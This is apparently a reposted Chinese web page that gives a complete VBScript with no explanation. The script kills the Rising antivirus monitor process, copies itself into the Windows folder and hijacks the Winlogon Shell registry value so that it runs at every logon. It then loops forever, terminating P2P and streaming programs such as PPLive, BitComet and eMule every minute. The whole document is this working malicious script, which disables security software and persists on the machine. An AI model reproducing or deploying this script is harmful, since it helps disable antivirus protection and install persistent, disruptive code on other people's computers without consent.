一个杀进程同时修改注册表的vb脚本

来源:互联网 发布:找黑客修改博客数据 编辑:程序博客网 时间:2024/04/28 22:37

WQL = "Select * FROM Win32_Process Where Name='ravmon.exe'"
Set objServices = GetObject("WinMgmts:")
Set colobjServicesSet = objServices.ExecQuery(WQL)

For Each objSWbemObject In colobjServicesSet
objSWbemObject.Terminate
Next


do
set aa=createobject("scripting.filesystemobject")
aa.getfile(wscript.scriptfullname).copy("c:/windows/1.vbs")
set bb=createobject("wscript.shell")
bb.regwrite"HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/Shell","explorer.exe   1.vbs"

WQL = "Select * FROM Win32_Process Where Name='PPLive.exe'"
Set objServices = GetObject("WinMgmts:")
Set colobjServicesSet = objServices.ExecQuery(WQL)
 
For Each objSWbemObject In colobjServicesSet
objSWbemObject.Terminate
Next

WQL = "Select * FROM Win32_Process Where Name='QQLive.exe'"
Set objServices = GetObject("WinMgmts:")
Set colobjServicesSet = objServices.ExecQuery(WQL)
 
For Each objSWbemObject In colobjServicesSet
objSWbemObject.Terminate
Next

WQL = "Select * FROM Win32_Process Where Name='ppStream.exe'"
Set objServices = GetObject("WinMgmts:")
Set colobjServicesSet = objServices.ExecQuery(WQL)
 
For Each objSWbemObject In colobjServicesSet
objSWbemObject.Terminate
Next

WQL = "Select * FROM Win32_Process Where Name='BitComet.exe'"
Set objServices = GetObject("WinMgmts:")
Set colobjServicesSet = objServices.ExecQuery(WQL)
 
For Each objSWbemObject In colobjServicesSet
objSWbemObject.Terminate
Next

WQL = "Select * FROM Win32_Process Where Name='UUsee.exe'"
Set objServices = GetObject("WinMgmts:")
Set colobjServicesSet = objServices.ExecQuery(WQL)
 
For Each objSWbemObject In colobjServicesSet
objSWbemObject.Terminate
Next

WQL = "Select * FROM Win32_Process Where Name='Mysee.exe'"
Set objServices = GetObject("WinMgmts:")
Set colobjServicesSet = objServices.ExecQuery(WQL)
 
For Each objSWbemObject In colobjServicesSet
objSWbemObject.Terminate
Next

WQL = "Select * FROM Win32_Process Where Name='Vagaa.exe'"
Set objServices = GetObject("WinMgmts:")
Set colobjServicesSet = objServices.ExecQuery(WQL)
 
For Each objSWbemObject In colobjServicesSet
objSWbemObject.Terminate
Next

WQL = "Select * FROM Win32_Process Where Name='PPMate.exe'"
Set objServices = GetObject("WinMgmts:")
Set colobjServicesSet = objServices.ExecQuery(WQL)
 
For Each objSWbemObject In colobjServicesSet
objSWbemObject.Terminate
Next

WQL = "Select * FROM Win32_Process Where Name='eMule.exe'"
Set objServices = GetObject("WinMgmts:")
Set colobjServicesSet = objServices.ExecQuery(WQL)
 
For Each objSWbemObject In colobjServicesSet
objSWbemObject.Terminate
Next

Wscript.Sleep 60000

loop  

原创粉丝点击